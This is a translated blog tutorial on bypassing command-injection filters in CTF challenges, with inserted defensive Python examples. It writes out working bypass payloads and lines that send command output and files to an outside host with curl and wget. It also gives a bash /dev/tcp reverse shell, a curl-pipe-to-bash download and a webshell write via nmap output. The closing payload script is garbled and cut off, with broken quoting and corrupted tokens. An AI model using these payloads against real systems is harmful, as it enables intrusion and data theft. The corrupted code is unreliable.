2025-01-19 Update. From: SLTechnology News&Howtos, Network Security
Shulou (Shulou.com) 05/31 Report
The editor shares here how command execution bypasses are achieved in CTF challenges. Most people know little about this, so the article is offered for your reference; I hope you learn a lot from it. Let's get started.
For reference, study and use only
Command execution bypass
Brief introduction
Commands are executed through PHP's dangerous functions.
Simple examples
In a feature that pings a user-supplied IP, any command can be executed by appending it with a Linux command separator.
Commands can also be executed through PHP variable variables, in forms similar to ${cmd} or $$a.
Most Linux commands live in /bin or /sbin. If a command cannot be executed by name, try its full path, such as /bin/cat.
Common delimiters
;
Separates commands; each command is executed in turn from left to right regardless of whether the previous one failed, so all commands run.
&
Background execution.
&&
Connects commands as a logical AND: the command on the right of && runs only if the command on the left returned true (return value $? == 0). As soon as a command returns false ($? == 1), the subsequent command is not executed.
|
Command A | Command B: the standard output of command A is used as the input of command B. For example, ps aux | grep "test" searches the output of ps aux for "test".
||
Connects commands as a logical OR: the command on the right runs only if the command on the left returned false ($? == 1).
0a, 0d
Newline (0x0a) and carriage return (0x0d) characters also terminate a command.
Win:
PHP functions that can execute commands
system()
shell_exec()
eval()
assert()
exec()
preg_replace()
call_user_func()
passthru()
pcntl_exec()
popen()
proc_open()
Backtick execution (backticks are equivalent to shell_exec())
Rayi\shinelon
Common filter bypasses
Encoding bypass
If the site with the command injection filters certain delimiters, they can be bypassed by encoding them (URL encoding, base64, etc.).
Octal bypass
$(printf "\154\163")    # the ls command
Such fragments can be concatenated to build longer commands.
// The filter here allows only 0-9a-zA-Z ">\$(); the octal-encoded payload, built with printf and $IFS$9 in place of spaces, is echoed into /detect.py (a Python reverse-shell script).
Example:
from flask import Flask, render_template, request
import subprocess
import re

app = Flask(__name__)


@app.route('/', methods=['GET'])
def index():
    return render_template('index.html')


@app.route('/run', methods=['POST'])
def run():
    cmd = request.form.get("cmd")
    # Character allowlist: only 0-9 a-z A-Z " > \ $ ( ) may appear
    if re.search(r'[^0-9a-zA-Z">\\$()]', cmd):
        return 'Hacker'
    # Keyword denylist
    if re.search(r'ping|wget|curl|bash|perl|python|php|kill|ps', cmd):
        return 'Hacker'
    # The command string is still handed to a shell
    p = subprocess.Popen(cmd, stderr=subprocess.STDOUT,
                         stdout=subprocess.PIPE, shell=True, close_fds=True)
    try:
        (msg, errs) = p.communicate(timeout=5)
        return msg
    except Exception as e:
        return 'Error'


app.run(host='0.0.0.0', port=5000)
The payload overwrites the scheduled detect.py that the challenge's cleanup process runs, so it executes directly with root privileges.
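As an added, defender-side counterpart to the challenge's run() handler (constructed for this article, not part of the original challenge or of any project), the same endpoint logic rebuilt without shell=True: an allowlist of programs and a strict argument charset replace the character and keyword denylist, so separators, $IFS and quoting tricks never reach a shell. The allowlisted programs are an assumption.

```python
import re
import shlex
import subprocess

# Assumption: these are the only programs the feature legitimately needs.
ALLOWED_PROGRAMS = {"ls", "id", "uname"}
# Arguments: short plain tokens; no spaces, quotes, $, ;, |, & or backticks.
SAFE_ARG = re.compile(r"[A-Za-z0-9._/-]{1,64}")


def parse_request(cmd: str, max_args: int = 4):
    """Turn the submitted string into an argv list, or None if it is not
    an allowed program with plain arguments. No shell is ever involved."""
    try:
        argv = shlex.split(cmd)  # tokenise like a shell would, without running one
    except ValueError:           # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_PROGRAMS or len(argv) > max_args:
        return None
    for arg in argv[1:]:
        # fullmatch: the whole token must be plain; ".." blocks directory walking
        if not SAFE_ARG.fullmatch(arg) or ".." in arg:
            return None
    return argv


def run_request(cmd: str) -> bytes:
    """Execute an accepted request with shell=False and a timeout."""
    argv = parse_request(cmd)
    if argv is None:
        return b"rejected"
    try:
        proc = subprocess.run(argv, capture_output=True, timeout=5)
    except subprocess.TimeoutExpired:
        return b"timeout"
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    # Constructed inputs: one legitimate request and the bypass forms from this page.
    # Note that shlex normalises "l\s" to "ls": the backslash trick is harmless here
    # because the allowlist is checked on the normalised argv and no shell runs it.
    for cmd in ["ls -la /tmp", "ls;id", "ls${IFS}/etc", "{ls,/etc}",
                "ls $(id)", "l\\s /etc", "ls '/etc"]:
        print(f"{cmd!r:22} -> {parse_request(cmd)}")
```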
Hexadecimal bypass
echo "636174202F6574632F706173737764" | xxd -r -p | bash    # the hex decodes to: cat /etc/passwd
Space filtering
Linux built-in delimiters
${IFS}, $IFS, $IFS$9
root# cat${IFS}flag
weqweqweqweqweqwe
root# cat$IFS$9flag
weqweqweqweqweqwe
>, + filtering
To bypass filtering of symbols such as > and +, use the $PS2 variable, which is >, and the $PS4 variable, which is +.
Keyword bypass
Achieve the bypass by splitting the keyword.
Empty variable bypass
cat fl${x}ag
cat tes$(z)t/flag
Environment variable bypass
$PATH => "/usr/local/...blablabla"
${PATH:0:1} => '/'
${PATH:1:1} => 'u'
${PATH:0:4} => '/usr'
Empty string bypass
cat fl""ag
cat fl''ag
cat "fl"ag
Backslash bypass
ca\t flag
l\s
Empty variables
$* and $@, $x (x is 1-9) and ${x} (x >= 10) are empty when no positional parameters have been passed, so ca${21}t a.txt means cat a.txt. For example:
wh$1oami
who$@ami
whoa$*mi
Using curly braces
In Linux bash, {OS_COMMAND,ARGUMENT} can also be used to execute a system command:
{cat,flag}
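As an added defender-side example (not part of the original article), a small Python detector that flags the space-filter, keyword-splitting and encoding tricks listed above when run over submitted command strings; the patterns and sample inputs are constructed here and are only a starting point for logging or alerting.

```python
import re

# Indicators drawn from the bypass tricks listed above. The patterns are
# constructed for this example and deliberately narrow: a starting ruleset
# for logging or alerting, not a complete filter.
INDICATORS = [
    (r"\$\{?IFS\}?", "IFS used in place of whitespace"),
    (r"\$\{PATH:\d+:\d+\}", "PATH slicing to build characters"),
    (r"\w\$(\{(?!IFS\})\w+\}|[0-9*@])\w", "empty variable spliced into a word"),
    (r"\$\([^)]*\)|`[^`]*`", "command substitution"),
    (r"\{[^{}\s]+,[^{}\s]+\}", "brace expansion replacing spaces"),
    (r"\\[A-Za-z]", "backslash splitting a keyword"),
    (r"\w(''|\"\")\w", "empty quotes splitting a keyword"),
    (r"\bxxd\s+-r\s+-p\b", "hex decoding piped to a shell"),
    (r"printf\s+[\"']?\\[0-7]{3}", "octal escapes building a command"),
    (r"\$PS[24]\b", "PS2/PS4 standing in for > or +"),
    (r"(?i)%0[ad]|[\r\n]", "embedded newline separator"),
    (r"/dev/tcp/", "bash tcp pseudo-device"),
]
COMPILED = [(re.compile(p), label) for p, label in INDICATORS]


def indicators(cmd: str) -> list[str]:
    """Return the label of every bypass indicator found in cmd (empty if none)."""
    return [label for rx, label in COMPILED if rx.search(cmd)]


# Constructed sample inputs: the bypass forms from this page plus two benign commands.
SAMPLES = [
    "cat${IFS}flag",
    "cat$IFS$9flag",
    "ca\\t flag",
    "{cat,flag}",
    "cat fl${x}ag",
    "wh$1oami",
    'cat fl""ag',
    "${PATH:0:1}bin${PATH:0:1}ls",
    'echo "636174202F6574632F706173737764" | xxd -r -p | bash',
    '$(printf "\\154\\163")',
    "ping 127.0.0.1",
    "ps aux | grep test",
]

if __name__ == "__main__":
    for s in SAMPLES:
        hits = indicators(s)
        print(f"{'ALERT' if hits else 'ok   '} {s!r}: {', '.join(hits) or '-'}")
```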
Command execution without echo
The result of a command can be sent out in the URL requested by curl:
curl www.rayi.vip/`whoami`
It then appears in the server log:
xx.xx.xx.xx - [12/Aug/2019:10:32:10 +0800] "GET /root HTTP/1.1" 404 146 "-" "curl/7.58.0"
In this way, the output of the command can be read from the log.
Commands that can read files: ls, bash, tac, nl, more, less, head, wget, tail, vi, cat, od, grep, sed, bzmore, bzless, pcre, paste, diff, file, echo, sort, cut, xxd
Reading out with wget without echo
wget --post-file flag 47.100.120.123:2333
escapeshellarg() / escapeshellcmd() bypass
escapeshellarg()
escapeshellarg(string $arg): string
escapeshellarg() wraps the string in single quotes and quotes or escapes any existing single quotes, so that the string can be passed directly to a shell function as one safe argument. It should be used on individual arguments that come from user input.
Examples
escapeshellcmd()
escapeshellcmd(string $command): string
escapeshellcmd() escapes any characters in the string that could be used to trick a shell command into executing arbitrary commands. It ensures that user data is escaped before it is passed to exec() or system(), or to the backtick operator.
A backslash (\) is inserted before the following characters: & # ; ` | * ? ~ < > ^ ( ) [ ] { } $ \ , \x0A and \xFF. ' and " are escaped only when they are not paired. On Windows, all of these characters, as well as % and !, are replaced by spaces.
Escape for single quotation marks
Vulnerability caused by using both together
escapeshellarg() is meant to prevent argument injection, but applying escapeshellcmd() on top of it re-enables argument injection.
Example:
Here only a single IP address can be scanned; no parameters can be added.
-oN/-oX/-oG:
Write the report to a file in normal (custom .txt), XML or grepable format.
But with an extra escapeshellcmd(),
a one-line webshell can be written to a file.
Be careful to double the single quotes, otherwise strange errors appear in the file name or elsewhere.
Length bypass
Reference challenge: https://www.jianshu.com/p/a77e956d9941
phith0n's (P神) article: https://www.leavesongs.com/SHARE/some-tricks-from-my-secret-group.html
Challenges: HITCON 2017 babyfirst; HGame 2020 "problem maker Service Center"
Suppose we can execute only commands of at most 5 characters at a time.
Principle
When a Linux command is executed, a backslash at the end of a line continues the command on the next line.
The same rule applies inside bash scripts.
So file names ending with a backslash can be joined into a command: write the file names into a file with ls -t > o, then run that file as a script with bash o.
ls output
By default, ls sorts by ASCII code from smallest to largest.
To control the order of the files, use ls -t.
ls -t sorts by the time the file was created.
Write the ls -t output to a file
In this way we first split the command to be executed into file names ending with a backslash, write those file names into a file with ls -t, and then run that file as a script with bash.
Backslash
Combined use
Constructing ls -t
>ls\\    # create a file named "ls\"
ls>_     # write the listing (only "ls\" so far) to _, so that ls comes first in the ls -t output
>\ \\    # create a file named " \" to provide the space between ls and -t
>-t\\    # create a file named "-t\"
>\>g     # create a file named ">g"
ls>>_    # append all file names to _
sh _     # run _: the lines joined by their trailing backslashes become ls -t>g, and the result goes into file g
With ls -t as a stepping stone, we can write other commands.
For convenience, we can use curl to download a script from our VPS and get a reverse shell. So we only need to construct
curl 47.100.120.123Unigram | bash
On the VPS:
bash -i >& /dev/tcp/47.100.120.123/2333 0>&1
For more convenience, the VPS IP can be converted to a single decimal number:
http://www.msxindl.com/tools/ip/ip_num.asp
795113595
So the payload to construct becomes
curl 795113595amp g | bash
I used the Pagoda (BT) panel on my VPS and did not figure out how to get it to support a purely numeric IP.
import requests
from time import sleep
import urllib

payload = [
    # generate the `ls -t > g` file
    '> ls\\', 'ls > _', '>\', '>-t\\', '>\ > grub, 'ls > > _',
    # generate `bash`
    # Note that a file name cannot be duplicated.
    # Note that the VPS can only be used via index, because a file name cannot start with /.
    # Tragically, my VPS IP happens to contain two zeros, so only a domain name can be used:
    '> sh\', '> ba\\', '>\ |\ |\\', '> p\', '> vi\\', '> I.\\', '> y\\', '> ra\\', '> w.\', '> ww\\', '>\', '> rl\\', '> cu\\'
    # exec
    'sh _',
    # execute ls -t > g
    'sh g'
]
r = requests.get('http://url/?reset=1')
for i in payload:
    assert len(i)